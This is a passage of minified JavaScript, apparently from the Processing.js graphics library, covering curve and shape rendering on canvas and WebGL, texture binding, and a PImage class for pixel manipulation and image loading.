3;eb++){d9.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=5;eb<9;eb++){eg.push(ef[eb])}}bg(d9,"LINES",ej)}else{if(dN===9){if(ei>2){for(ed=0;ed+2<ei;ed+=3){d7=[];ec=[];d9=[];eg=[];ej=[];for(eb=0;eb<3;eb++){for(d8=0;d8<3;d8++){d9.push(a7[ed+eb][d8]);d7.push(a7[ed+eb][d8])}}for(eb=0;eb<3;eb++){for(d8=3;d8<5;d8++){ec.push(a7[ed+eb][d8])}}for(eb=0;eb<3;eb++){for(d8=5;d8<9;d8++){eg.push(a7[ed+eb][d8]);ej.push(a7[ed+eb][d8+4])}}if(cd){bg(d9,"LINE_LOOP",ej)}if(aF||dP){dk(d7,"TRIANGLES",eg,ec)}}}}else{if(dN===10){if(ei>2){for(ed=0;ed+2<ei;ed++){d9=[];d7=[];ej=[];eg=[];ec=[];for(eb=0;eb<3;eb++){for(d8=0;d8<3;d8++){d9.push(a7[ed+eb][d8]);d7.push(a7[ed+eb][d8])}}for(eb=0;eb<3;eb++){for(d8=3;d8<5;d8++){ec.push(a7[ed+eb][d8])}}for(eb=0;eb<3;eb++){for(d8=5;d8<9;d8++){ej.push(a7[ed+eb][d8+4]);eg.push(a7[ed+eb][d8])}}if(aF||dP){dk(d7,"TRIANGLE_STRIP",eg,ec)}if(cd){bg(d9,"LINE_LOOP",ej)}}}}else{if(dN===11){if(ei>2){for(ed=0;ed<3;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}}for(ed=0;ed<3;ed++){ef=a7[ed];for(eb=9;eb<13;eb++){ej.push(ef[eb])}}if(cd){bg(d9,"LINE_LOOP",ej)}for(ed=2;ed+1<ei;ed++){d9=[];ej=[];d9.push(a7[0][0]);d9.push(a7[0][1]);d9.push(a7[0][2]);ej.push(a7[0][9]);ej.push(a7[0][10]);ej.push(a7[0][11]);ej.push(a7[0][12]);for(eb=0;eb<2;eb++){for(d8=0;d8<3;d8++){d9.push(a7[ed+eb][d8])}}for(eb=0;eb<2;eb++){for(d8=9;d8<13;d8++){ej.push(a7[ed+eb][d8])}}if(cd){bg(d9,"LINE_STRIP",ej)}}if(aF||dP){dk(d7,"TRIANGLE_FAN",eg,ec)}}}else{if(dN===16){for(ed=0;ed+3<ei;ed+=4){d9=[];for(eb=0;eb<4;eb++){ef=a7[ed+eb];for(d8=0;d8<3;d8++){d9.push(ef[d8])}}if(cd){bg(d9,"LINE_LOOP",ej)}if(aF){d7=[];eg=[];ec=[];for(eb=0;eb<3;eb++){d7.push(a7[ed][eb])}for(eb=5;eb<9;eb++){eg.push(a7[ed][eb])}for(eb=0;eb<3;eb++){d7.push(a7[ed+1][eb])}for(eb=5;eb<9;eb++){eg.push(a7[ed+1][eb])}for(eb=0;eb<3;eb++){d7.push(a7[ed+3][eb])}for(eb=5;eb<9;eb++){eg.push(a7[ed+3][eb])}for(eb=0;eb<3;eb++){d7.push(a7[ed+2][eb])}for(eb=5;eb<9;eb++){eg.push(a7[ed+2][eb])}if(dP){ec.push(a7[ed+0][3]);ec.push(a7[ed+0][4]);ec.push(a7[ed+1][3]);ec.push(a7[ed+1][4]);ec.push(a7[ed+3][3]);ec.push(a7[ed+3][4]);ec.push(a7[ed+2][3]);ec.push(a7[ed+2][4])}dk(d7,"TRIANGLE_STRIP",eg,ec)}}}else{if(dN===17){var eh=[];if(ei>3){for(ed=0;ed<2;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}}for(ed=0;ed<2;ed++){ef=a7[ed];for(eb=9;eb<13;eb++){ej.push(ef[eb])}}bg(d9,"LINE_STRIP",ej);if(ei>4&&ei%2>0){eh=d7.splice(d7.length-3);a7.pop()}for(ed=0;ed+3<ei;ed+=2){d9=[];ej=[];for(eb=0;eb<3;eb++){d9.push(a7[ed+1][eb])}for(eb=0;eb<3;eb++){d9.push(a7[ed+3][eb])}for(eb=0;eb<3;eb++){d9.push(a7[ed+2][eb])}for(eb=0;eb<3;eb++){d9.push(a7[ed+0][eb])}for(eb=9;eb<13;eb++){ej.push(a7[ed+1][eb])}for(eb=9;eb<13;eb++){ej.push(a7[ed+3][eb])}for(eb=9;eb<13;eb++){ej.push(a7[ed+2][eb])}for(eb=9;eb<13;eb++){ej.push(a7[ed+0][eb])}if(cd){bg(d9,"LINE_STRIP",ej)}}if(aF||dP){dk(d7,"TRIANGLE_LIST",eg,ec)}}}else{if(ei===1){for(eb=0;eb<3;eb++){d9.push(a7[0][eb])}for(eb=9;eb<13;eb++){ej.push(a7[0][eb])}dX(d9,ej)}else{for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}for(eb=5;eb<9;eb++){ej.push(ef[eb])}}if(cd&&ea){bg(d9,"LINE_LOOP",ej)}else{if(cd&&!ea){bg(d9,"LINE_STRIP",ej)}}if(aF||dP){dk(d7,"TRIANGLE_FAN",eg,ec)}}}}}}}}}dP=false;d4.useProgram(du);dV("usingTexture3d",du,"usingTexture",dP)}}dL=false;Y=false;ca=[];c1=0};var aU=function(ea,d9){var eb=1/ea;var d8=eb*eb;var d7=d8*eb;d9.set(0,0,0,1,d7,d8,eb,0,6*d7,2*d8,0,0,6*d7,0,0,0)};var dn=function(){if(!aJ){c2=new aM;aJ=new aM;cL=true}var d7=aH;c2.set((d7-1)/2,(d7+3)/2,(-3-d7)/2,(1-d7)/2,1-d7,(-5-d7)/2,d7+2,(d7-1)/2,(d7-1)/2,0,(1-d7)/2,0,0,1,0,0);aU(O,aJ);if(!cc){aN=new aM}aN.set(c2);aN.preApply(cc);aJ.apply(c2)};bO.prototype.bezierVertex=function(){Y=true;var d7=[];if(dr){throw"vertex() must be used at least once before calling bezierVertex()"}for(var d8=0;d8<arguments.length;d8++){d7[d8]=arguments[d8]}a7.push(d7);a7[a7.length-1]["isVert"]=false};by.prototype.bezierVertex=function(){Y=true;var ee=[];if(dr){throw"vertex() must be used at least once before calling bezierVertex()"}if(arguments.length===9){if(bw===r){bw=new aM}var ej=a7.length-1;aU(cx,bw);bw.apply(S);var el=bw.array();var ea=a7[ej][0],ek=a7[ej][1],ed=a7[ej][2];var eg=el[4]*ea+el[5]*arguments[0]+el[6]*arguments[3]+el[7]*arguments[6];var ef=el[8]*ea+el[9]*arguments[0]+el[10]*arguments[3]+el[11]*arguments[6];var ec=el[12]*ea+el[13]*arguments[0]+el[14]*arguments[3]+el[15]*arguments[6];var em=el[4]*ek+el[5]*arguments[1]+el[6]*arguments[4]+el[7]*arguments[7];var ei=el[8]*ek+el[9]*arguments[1]+el[10]*arguments[4]+el[11]*arguments[7];var eh=el[12]*ek+el[13]*arguments[1]+el[14]*arguments[4]+el[15]*arguments[7];var d9=el[4]*ed+el[5]*arguments[2]+el[6]*arguments[5]+el[7]*arguments[8];var d8=el[8]*ed+el[9]*arguments[2]+el[10]*arguments[5]+el[11]*arguments[8];var d7=el[12]*ed+el[13]*arguments[2]+el[14]*arguments[5]+el[15]*arguments[8];for(var eb=0;eb<cx;eb++){ea+=eg;eg+=ef;ef+=ec;ek+=em;em+=ei;ei+=eh;ed+=d9;d9+=d8;d8+=d7;cV.vertex(ea,ek,ed)}cV.vertex(arguments[6],arguments[7],arguments[8])}};cV.texture=function(ea){var d8=dU.$ensureContext();if(ea.__texture){d8.bindTexture(d8.TEXTURE_2D,ea.__texture)}else{if(ea.localName==="canvas"){d8.bindTexture(d8.TEXTURE_2D,c6);d8.texImage2D(d8.TEXTURE_2D,0,d8.RGBA,d8.RGBA,d8.UNSIGNED_BYTE,ea);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_MAG_FILTER,d8.LINEAR);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_MIN_FILTER,d8.LINEAR);d8.generateMipmap(d8.TEXTURE_2D);cr.width=ea.width;cr.height=ea.height}else{var d9=d8.createTexture(),ec=d.createElement("canvas"),d7=ec.getContext("2d"),eb;if(ea.width&ea.width-1===0){ec.width=ea.width}else{eb=1;while(eb<ea.width){eb*=2}ec.width=eb}if(ea.height&ea.height-1===0){ec.height=ea.height}else{eb=1;while(eb<ea.height){eb*=2}ec.height=eb}d7.drawImage(ea.sourceImg,0,0,ea.width,ea.height,0,0,ec.width,ec.height);d8.bindTexture(d8.TEXTURE_2D,d9);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_MIN_FILTER,d8.LINEAR_MIPMAP_LINEAR);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_MAG_FILTER,d8.LINEAR);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_WRAP_T,d8.CLAMP_TO_EDGE);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_WRAP_S,d8.CLAMP_TO_EDGE);d8.texImage2D(d8.TEXTURE_2D,0,d8.RGBA,d8.RGBA,d8.UNSIGNED_BYTE,ec);d8.generateMipmap(d8.TEXTURE_2D);ea.__texture=d9;cr.width=ea.width;cr.height=ea.height}}dP=true;d8.useProgram(du);dV("usingTexture3d",du,"usingTexture",dP)};cV.textureMode=function(d7){d0=d7};var aq=function(es,ed,ej,eq,ec,ei,eo,eb,eh,em,ea,ef){var et=eq;var ee=ec;var ek=ei;var eg=aJ.array();var er=eg[4]*es+eg[5]*eq+eg[6]*eo+eg[7]*em;var ep=eg[8]*es+eg[9]*eq+eg[10]*eo+eg[11]*em;var en=eg[12]*es+eg[13]*eq+eg[14]*eo+eg[15]*em;var ew=eg[4]*ed+eg[5]*ec+eg[6]*eb+eg[7]*ea;var ev=eg[8]*ed+eg[9]*ec+eg[10]*eb+eg[11]*ea;var eu=eg[12]*ed+eg[13]*ec+eg[14]*eb+eg[15]*ea;var d9=eg[4]*ej+eg[5]*ei+eg[6]*eh+eg[7]*ef;var d8=eg[8]*ej+eg[9]*ei+eg[10]*eh+eg[11]*ef;var d7=eg[12]*ej+eg[13]*ei+eg[14]*eh+eg[15]*ef;cV.vertex(et,ee,ek);for(var el=0;el<O;el++){et+=er;er+=ep;ep+=en;ee+=ew;ew+=ev;ev+=eu;ek+=d9;d9+=d8;d8+=d7;cV.vertex(et,ee,ek)}};bO.prototype.curveVertex=function(d7,d8){dL=true;cV.vertex(d7,d8)};by.prototype.curveVertex=function(d7,ea,d9){dL=true;if(!cL){dn()}var d8=[];d8[0]=d7;d8[1]=ea;d8[2]=d9;ca.push(d8);c1++;if(c1>3){aq(ca[c1-4][0],ca[c1-4][1],ca[c1-4][2],ca[c1-3][0],ca[c1-3][1],ca[c1-3][2],ca[c1-2][0],ca[c1-2][1],ca[c1-2][2],ca[c1-1][0],ca[c1-1][1],ca[c1-1][2])}};bO.prototype.curve=function(){if(arguments.length===8){cV.beginShape();cV.curveVertex(arguments[0],arguments[1]);cV.curveVertex(arguments[2],arguments[3]);cV.curveVertex(arguments[4],arguments[5]);cV.curveVertex(arguments[6],arguments[7]);cV.endShape()}};by.prototype.curve=function(){if(arguments.length===12){cV.beginShape();cV.curveVertex(arguments[0],arguments[1],arguments[2]);cV.curveVertex(arguments[3],arguments[4],arguments[5]);cV.curveVertex(arguments[6],arguments[7],arguments[8]);cV.curveVertex(arguments[9],arguments[10],arguments[11]);cV.endShape()}};cV.curveTightness=function(d7){aH=d7};cV.curveDetail=function(d7){O=d7;dn()};cV.rectMode=function(d7){bI=d7};cV.imageMode=function(d7){switch(d7){case 0:bh=aV;break;case 1:bh=b0;break;case 3:bh=aL;break;default:throw"Invalid imageMode"}};cV.ellipseMode=function(d7){cM=d7};cV.arc=function(ej,eh,ea,el,d9,ei){if(ea<=0||ei<d9){return}if(cM===1){ea=ea-ej;el=el-eh}else{if(cM===2){ej=ej-ea;eh=eh-el;ea=ea*2;el=el*2}else{if(cM===3){ej=ej-ea/2;eh=eh-el/2}}}while(d9<0){d9+=6.283185307179586;ei+=6.283185307179586}if(ei-d9>6.283185307179586){d9=0;ei=6.283185307179586}var ek=ea/2;var em=el/2;var ee=ej+ek;var ec=eh+em;var d8=0|-0.5+d9*cV.RAD_TO_DEG*2;var eg=0|0.5+ei*cV.RAD_TO_DEG*2;var ef,ed;if(aF){var eb=cd;cd=false;cV.beginShape();cV.vertex(ee,ec);for(ef=d8;ef<=eg;ef++){ed=ef%720;cV.vertex(ee+bi[ed]*ek,ec+ag[ed]*em)}cV.endShape(2);cd=eb}if(cd){var d7=aF;aF=false;cV.beginShape();for(ef=d8;ef<=eg;ef++){ed=ef%720;cV.vertex(ee+bi[ed]*ek,ec+ag[ed]*em)}cV.endShape();aF=d7}};bO.prototype.line=function(d8,ef,d7,ed){if(!cd){return}d8=o.round(d8);d7=o.round(d7);ef=o.round(ef);ed=o.round(ed);if(d8===d7&&ef===ed){cV.point(d8,ef);return}var d9=r,eg=r,ec=true,ee=dF.array(),ea=[1,0,0,0,1,0];for(var eb=0;eb<6&&ec;eb++){ec=ee[eb]===ea[eb]}if(ec){if(d8===d7){if(ef>ed){d9=ef;ef=ed;ed=d9}ed++;if(dS%2===1){d4.translate(0.5,0)}}else{if(ef===ed){if(d8>d7){d9=d8;d8=d7;d7=d9}d7++;if(dS%2===1){d4.translate(0,0.5)}}}if(dS===1){eg=d4.lineCap;d4.lineCap="butt"}}d4.beginPath();d4.moveTo(d8||0,ef||0);d4.lineTo(d7||0,ed||0);dc();if(ec){if(d8===d7&&dS%2===1){d4.translate(-0.5,0)}else{if(ef===ed&&dS%2===1){d4.translate(0,-0.5)}}if(dS===1){d4.lineCap=eg}}};by.prototype.line=function(d9,ec,ee,d8,ea,ed){if(ea===r||ed===r){ed=0;ea=d8;d8=ee;ee=0}if(d9===d8&&ec===ea&&ee===ed){cV.point(d9,ec,ee);return}var eb=[d9,ec,ee,d8,ea,ed];var d7=new aM;d7.scale(1,-1,1);d7.apply(dF.array());d7.transpose();if(dS>0&&cd){d4.useProgram(dM);a5("model2d",dM,"model",false,[1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1]);a5("view2d",dM,"view",false,d7.array());dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);db("vertex2d",dM,"Vertex",3,b7);cf("aTextureCoord2d",dM,"aTextureCoord");d4.bufferData(d4.ARRAY_BUFFER,new e(eb),d4.STREAM_DRAW);d4.drawArrays(d4.LINES,0,2)}};bO.prototype.bezier=function(){if(arguments.length!==8){throw"You must use 8 parameters for bezier() in 2D mode"}cV.beginShape();cV.vertex(arguments[0],arguments[1]);cV.bezierVertex(arguments[2],arguments[3],arguments[4],arguments[5],arguments[6],arguments[7]);cV.endShape()};by.prototype.bezier=function(){if(arguments.length!==12){throw"You must use 12 parameters for bezier() in 3D mode"}cV.beginShape();cV.vertex(arguments[0],arguments[1],arguments[2]);cV.bezierVertex(arguments[3],arguments[4],arguments[5],arguments[6],arguments[7],arguments[8],arguments[9],arguments[10],arguments[11]);cV.endShape()};cV.bezierDetail=function(d7){cx=d7};cV.bezierPoint=function(d8,d7,eb,ea,d9){return(1-d9)*(1-d9)*(1-d9)*d8+3*(1-d9)*(1-d9)*d9*d7+3*(1-d9)*d9*d9*eb+d9*d9*d9*ea};cV.bezierTangent=function(d8,d7,eb,ea,d9){return 3*d9*d9*(-d8+3*d7-3*eb+ea)+6*d9*(d8-2*d7+eb)+3*(-d8+d7)};cV.curvePoint=function(d8,d7,eb,ea,d9){return 0.5*(2*d7+(-d8+eb)*d9+(2*d8-5*d7+4*eb-ea)*d9*d9+(-d8+3*d7-3*eb+ea)*d9*d9*d9)};cV.curveTangent=function(d8,d7,eb,ea,d9){return 0.5*(-d8+eb+2*(2*d8-5*d7+4*eb-ea)*d9+3*(-d8+3*d7-3*eb+ea)*d9*d9)};cV.triangle=function(ea,ec,d8,eb,d7,d9){cV.beginShape(9);cV.vertex(ea,ec,0);cV.vertex(d8,eb,0);cV.vertex(d7,d9,0);cV.endShape()};cV.quad=function(ec,ee,ea,ed,d8,eb,d7,d9){cV.beginShape(16);cV.vertex(ec,ee,0);cV.vertex(ea,ed,0);cV.vertex(d8,eb,0);cV.vertex(d7,d9,0);cV.endShape()};var bL=function(ed,ec,d7,ee,eg,eb,ef,d8){if(d8===r){eb=eg;ef=eg;d8=eg}var d9=d7/2,ea=ee/2;if(eg>d9||eg>ea){eg=o.min(d9,ea)}if(eb>d9||eb>ea){eb=o.min(d9,ea)}if(ef>d9||ef>ea){ef=o.min(d9,ea)}if(d8>d9||d8>ea){d8=o.min(d9,ea)}if(!aF||cd){d4.translate(0.5,0.5)}d4.beginPath();d4.moveTo(ed+eg,ec);d4.lineTo(ed+d7-eb,ec);d4.quadraticCurveTo(ed+d7,ec,ed+d7,ec+eb);d4.lineTo(ed+d7,ec+ee-ef);d4.quadraticCurveTo(ed+d7,ec+ee,ed+d7-ef,ec+ee);d4.lineTo(ed+d8,ec+ee);d4.quadraticCurveTo(ed,ec+ee,ed,ec+ee-d8);d4.lineTo(ed,ec+eg);d4.quadraticCurveTo(ed,ec,ed+eg,ec);if(!aF||cd){d4.translate(-0.5,-0.5)}bk();dc()};bO.prototype.rect=function(d8,ee,eb,d7,d9,ec,ea,ed){if(!eb&&!d7){return}if(bI===1){eb-=d8;d7-=ee}else{if(bI===2){eb*=2;d7*=2;d8-=eb/2;ee-=d7/2}else{if(bI===3){d8-=eb/2;ee-=d7/2}}}d8=o.round(d8);ee=o.round(ee);eb=o.round(eb);d7=o.round(d7);if(d9!==r){bL(d8,ee,eb,d7,d9,ec,ea,ed);return}if(cd&&dS%2===1){d4.translate(0.5,0.5)}d4.beginPath();d4.rect(d8,ee,eb,d7);bk();dc();if(cd&&dS%2===1){d4.translate(-0.5,-0.5)}};by.prototype.rect=function(ef,ee,d7,eh,ej,ec,ei,d8){if(ej!==r){throw"rect() with rounded corners is not supported in 3D mode"}if(bI===1){d7-=ef;eh-=ee}else{if(bI===2){d7*=2;eh*=2;ef-=d7/2;ee-=eh/2}else{if(bI===3){ef-=d7/2;ee-=eh/2}}}var eb=new aM;eb.translate(ef,ee,0);eb.scale(d7,eh,1);eb.transpose();var ed=new aM;ed.scale(1,-1,1);ed.apply(dF.array());ed.transpose();if(dS>0&&cd){d4.useProgram(dM);a5("model2d",dM,"model",false,eb.array());a5("view2d",dM,"view",false,ed.array());dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);db("vertex2d",dM,"Vertex",3,aA);cf("aTextureCoord2d",dM,"aTextureCoord");d4.drawArrays(d4.LINE_LOOP,0,aj.length/3)}if(aF){d4.useProgram(du);a5("model3d",du,"model",false,eb.array());a5("view3d",du,"view",false,ed.array());d4.enable(d4.POLYGON_OFFSET_FILL);d4.polygonOffset(1,1);dY("color3d",du,"color",bl);if(dH>0){var eg=new aM;eg.set(ed);var d9=new aM;d9.set(eb);eg.mult(d9);var ea=new aM;ea.set(eg);ea.invert();ea.transpose();a5("normalTransform3d",du,"normalTransform",false,ea.array());db("normal3d",du,"Normal",3,b1)}else{cf("normal3d",du,"Normal")}db("vertex3d",du,"Vertex",3,aA);d4.drawArrays(d4.TRIANGLE_FAN,0,aj.length/3);d4.disable(d4.POLYGON_OFFSET_FILL)}};bO.prototype.ellipse=function(ed,ec,d8,ef){ed=ed||0;ec=ec||0;if(d8<=0&&ef<=0){return}if(cM===2){d8*=2;ef*=2}else{if(cM===1){d8=d8-ed;ef=ef-ec;ed+=d8/2;ec+=ef/2}else{if(cM===0){ed+=d8/2;ec+=ef/2}}}if(d8===ef){d4.beginPath();d4.arc(ed,ec,d8/2,0,6.283185307179586,false);bk();dc()}else{var ee=d8/2,eb=ef/2,d7=0.5522847498307933,ea=d7*ee,d9=d7*eb;cV.beginShape();cV.vertex(ed+ee,ec);cV.bezierVertex(ed+ee,ec-d9,ed+ea,ec-eb,ed,ec-eb);cV.bezierVertex(ed-ea,ec-eb,ed-ee,ec-d9,ed-ee,ec);cV.bezierVertex(ed-ee,ec+d9,ed-ea,ec+eb,ed,ec+eb);cV.bezierVertex(ed+ea,ec+eb,ed+ee,ec+d9,ed+ee,ec);cV.endShape()}};by.prototype.ellipse=function(ek,ej,d9,em){ek=ek||0;ej=ej||0;if(d9<=0&&em<=0){return}if(cM===2){d9*=2;em*=2}else{if(cM===1){d9=d9-ek;em=em-ej;ek+=d9/2;ej+=em/2}else{if(cM===0){ek+=d9/2;ej+=em/2}}}var el=d9/2,eg=em/2,d7=0.5522847498307933,eb=d7*el,ea=d7*eg;cV.beginShape();cV.vertex(ek+el,ej);cV.bezierVertex(ek+el,ej-ea,0,ek+eb,ej-eg,0,ek,ej-eg,0);cV.bezierVertex(ek-eb,ej-eg,0,ek-el,ej-ea,0,ek-el,ej,0);cV.bezierVertex(ek-el,ej+ea,0,ek-eb,ej+eg,0,ek,ej+eg,0);cV.bezierVertex(ek+eb,ej+eg,0,ek+el,ej+ea,0,ek+el,ej,0);cV.endShape();if(aF){var ec=0,eh=0,ee,ed;for(ee=0;ee<a7.length;ee++){ec+=a7[ee][0];eh+=a7[ee][1]}ec/=a7.length;eh/=a7.length;var ef=[],d8=[],ei=[];ef[0]=ec;ef[1]=eh;ef[2]=0;ef[3]=0;ef[4]=0;ef[5]=bl[0];ef[6]=bl[1];ef[7]=bl[2];ef[8]=bl[3];ef[9]=cZ[0];ef[10]=cZ[1];ef[11]=cZ[2];ef[12]=cZ[3];ef[13]=a4;ef[14]=a3;ef[15]=a2;a7.unshift(ef);for(ee=0;ee<a7.length;ee++){for(ed=0;ed<3;ed++){d8.push(a7[ee][ed])}for(ed=5;ed<9;ed++){ei.push(a7[ee][ed])}}dk(d8,"TRIANGLE_FAN",ei)}};cV.normal=function(d7,d9,d8){if(arguments.length!==3||!(typeof d7==="number"&&typeof d9==="number"&&typeof d8==="number")){throw"normal() requires three numeric arguments."}a4=d7;a3=d9;a2=d8;if(dN!==0){if(aY===0){aY=1}else{if(aY===1){aY=2}}}};cV.save=function(d8,d7){if(d7!==r){return B.open(d7.toDataURL(),"_blank")}return B.open(cV.externals.canvas.toDataURL(),"_blank")};var cv=0;cV.saveFrame=function(d7){if(d7===r){d7="screen-####.png"}var d8=d7.replace(/#+/,function(ea){var d9=""+cv++;while(d9.length<ea.length){d9="0"+d9}return d9});cV.save(d8)};var cb=d.createElement("canvas").getContext("2d");var V=[r,r,r];function bv(ee,d8,ed){var ea=V.shift();if(ea===r){ea={};ea.canvas=d.createElement("canvas");ea.context=ea.canvas.getContext("2d")}V.push(ea);var d9=ea.canvas,eb=ea.context,ec=d8||ee.width,d7=ed||ee.height;d9.width=ec;d9.height=d7;if(!ee){eb.clearRect(0,0,ec,d7)}else{if("data" in ee){eb.putImageData(ee,0,0)}else{eb.clearRect(0,0,ec,d7);eb.drawImage(ee,0,0,ec,d7)}}return ea}function bZ(d7){return{getLength:function(d8){return function(){if(d8.isRemote){throw"Image is loaded remotely. Cannot get length."}else{return d8.imageData.data.length?d8.imageData.data.length/4:0}}}(d7),getPixel:function(d8){return function(d9){var eb=d9*4,ea=d8.imageData.data;if(d8.isRemote){throw"Image is loaded remotely. Cannot get pixels."}return(ea[eb+3]&255)<<24|(ea[eb]&255)<<16|(ea[eb+1]&255)<<8|ea[eb+2]&255}}(d7),setPixel:function(d8){return function(d9,ec){var eb=d9*4,ea=d8.imageData.data;if(d8.isRemote){throw"Image is loaded remotely. Cannot set pixel."}ea[eb+0]=(ec>>16)&255;ea[eb+1]=(ec>>8)&255;ea[eb+2]=ec&255;ea[eb+3]=(ec>>24)&255;d8.__isDirty=true}}(d7),toArray:function(d8){return function(){var d9=[],ec=d8.imageData.data,eb=d8.width*d8.height;if(d8.isRemote){throw"Image is loaded remotely. Cannot get pixels."}for(var ea=0,ed=0;ea<eb;ea++,ed+=4){d9.push((ec[ed+3]&255)<<24|(ec[ed]&255)<<16|(ec[ed+1]&255)<<8|ec[ed+2]&255)}return d9}}(d7),set:function(d8){return function(d9){var ed,ec,ee;if(this.isRemote){throw"Image is loaded remotely. Cannot set pixels."}ec=d8.imageData.data;for(var ea=0,eb=d9.length;ea<eb;ea++){ee=d9[ea];ed=ea*4;ec[ed+0]=(ee>>16)&255;ec[ed+1]=(ee>>8)&255;ec[ed+2]=ee&255;ec[ed+3]=(ee>>24)&255}d8.__isDirty=true}}(d7)}}var cF=function(ea,ed,eb){this.__isDirty=false;if(ea instanceof HTMLImageElement){this.fromHTMLImageData(ea)}else{if(ed||eb){this.width=ea||1;this.height=ed||1;var d8=this.sourceImg=d.createElement("canvas");d8.width=this.width;d8.height=this.height;var ee=this.imageData=d8.getContext("2d").createImageData(this.width,this.height);this.format=eb===2||eb===4?eb:1;if(this.format===1){for(var d9=3,ec=this.imageData.data,d7=ec.length;d9<d7;d9+=4){ec[d9]=255}}this.__isDirty=true;this.updatePixels()}else{this.width=0;this.height=0;this.imageData=cb.createImageData(1,1);this.format=2}}this.pixels=bZ(this)};cF.prototype={__isPImage:true,updatePixels:function(){var d7=this.sourceImg;if(d7&&d7 instanceof HTMLCanvasElement&&this.__isDirty){d7.getContext("2d").putImageData(this.imageData,0,0)}this.__isDirty=false},fromHTMLImageData:function(d7){var d8=bv(d7);try{var ea=d8.context.getImageData(0,0,d7.width,d7.height);this.fromImageData(ea)}catch(d9){if(d7.width&&d7.height){this.isRemote=true;this.width=d7.width;this.height=d7.height}}this.sourceImg=d7},get:function(d7,ea,d8,d9){if(!arguments.length){return cV.get(this)}if(arguments.length===2){return cV.get(d7,ea,this)}if(arguments.length===4){return cV.get(d7,ea,d8,d9,this)}},set:function(d7,d9,d8){cV.set(d7,d9,d8,this);this.__isDirty=true},blend:function(ef,eb,ea,d8,ed,eg,ee,ec,d7,d9){if(arguments.length===9){cV.blend(this,ef,eb,ea,d8,ed,eg,ee,ec,d7,this)}else{if(arguments.length===10){cV.blend(ef,eb,ea,d8,ed,eg,ee,ec,d7,d9,this)}}delete this.sourceImg},copy:function(ee,eb,ea,d9,d8,ef,ed,ec,d7){if(arguments.length===8){cV.blend(this,ee,eb,ea,d9,d8,ef,ed,ec,0,this)}else{if(arguments.length===9){cV.blend(ee,eb,ea,d9,d8,ef,ed,ec,d7,0,this)}}delete this.sourceImg},filter:function(d8,d7){if(arguments.length===2){cV.filter(d8,d7,this)}else{if(arguments.length===1){cV.filter(d8,null,this)}}delete this.sourceImg},save:function(d7){cV.save(d7,this)},resize:function(d7,d9){if(this.isRemote){throw"Image is loaded remotely. Cannot resize."}if(this.width!==0||this.height!==0){if(d7===0&&d9!==0){d7=o.floor(this.width/this.height*d9)}else{if(d9===0&&d7!==0){d9=o.floor(this.height/this.width*d7)}}var d8=bv(this.imageData).canvas;var ea=bv(d8,d7,d9).context.getImageData(0,0,d7,d9);this.fromImageData(ea)}},mask:function(d7){var ea=this.toImageData(),d9,d8;if(d7 instanceof cF||d7.__isPImage){if(d7.width===this.width&&d7.height===this.height){d7=d7.toImageData();for(d9=2,d8=this.width*this.height*4;d9<d8;d9+=4){ea.data[d9+1]=d7.data[d9]}}else{throw"mask must have the same dimensions as PImage."}}else{if(d7 instanceof Array){if(this.width*this.height===d7.length){for(d9=0,d8=d7.length;d9<d8;++d9){ea.data[d9*4+3]=d7[d9]}}else{throw"mask array must be the same length as PImage pixels array."}}}this.fromImageData(ea)},loadPixels:E,toImageData:function(){if(this.isRemote){return this.sourceImg}if(!this.__isDirty){return this.imageData}var d7=bv(this.imageData);return d7.context.getImageData(0,0,this.width,this.height)},toDataURL:function(){if(this.isRemote){throw"Image is loaded remotely. Cannot create dataURI."}var d7=bv(this.imageData);return d7.canvas.toDataURL()},fromImageData:function(eb){var d8=eb.width,ea=eb.height,d9=d.createElement("canvas"),d7=d9.getContext("2d");this.width=d9.width=d8;this.height=d9.height=ea;d7.putImageData(eb,0,0);this.format=2;this.imageData=eb;this.sourceImg=d9}};cV.PImage=cF;cV.createImage=function(d7,d8,d9){return new cF(d7,d8,d9)};cV.loadImage=function(d8,d9,eb){if(d9){d8=d8+"."+d9}var ea;if(cP.imageCache.images[d8]){ea=new cF(cP.imageCache.images[d8]);ea.loaded=true;return ea}ea=new cF;var d7=d.createElement("img");ea.sourceImg=d7;d7.onload=function(ef,ed,ec){var eg=ef;var ee=ed;var eh=ec;return function(){ee.fromHTMLImageData(eg);ee.loaded=true;if(eh){eh()}}}(d7,ea,eb);d7.src=d8;return ea};cV.requestImage=cV.loadImage;function c8(d7,ea){var d8;if(d7>=cV.width||d7<0||ea<0||ea>=cV.height){return 0}if(dR){var d9=((0|d7)+cV.width*(0|ea))*4;d8=cV.imageData.data;return(d8[d9+3]&255)<<24|(d8[d9]&255)<<16|(d8[d9+1]&255)<<8|d8[d9+2]&255}d8=cV.toImageData(0|d7,0|ea,1,1).data;return(d8[3]&255)<<24|(d8[0]&255)<<16|(d8[1]&255)<<8|d8[2]&255}function c7(d7,eb,d8){if(d8.isRemote){throw"Image is loaded remotely. Cannot get x,y."}var ea=eb*d8.width*4+d7*4,d9=d8.imageData.data;return(d9[ea+3]&255)<<24|(d9[ea]&255)<<16|(d9[ea+1]&255)<<8|d9[ea+2]&255}function c5(d7,eb,d8,d9){var ea=new cF(d8,d9,2);ea.fromImageData(cV.toImageData(d7,eb,d8,d9));return ea}function c4(ec,eb,ed,ei,eo){if(eo.isRemote){throw"Image is loaded remotely. Cannot get x,y,w,h."}var em=new cF(ed,ei,2),d9=em.imageData.data,ea=eo.width,ej=eo.height,el=eo.imageData.data;var d7=o.max(0,-eb),d8=o.max(0,-ec),ee=o.min(ei,ej-eb),ef=o.min(ed,ea-ec);for(var eh=d7;eh<ee;++eh){var ek=((eb+eh)*ea+(ec+d8))*4;var en=(eh*ed+d8)*4;for(var 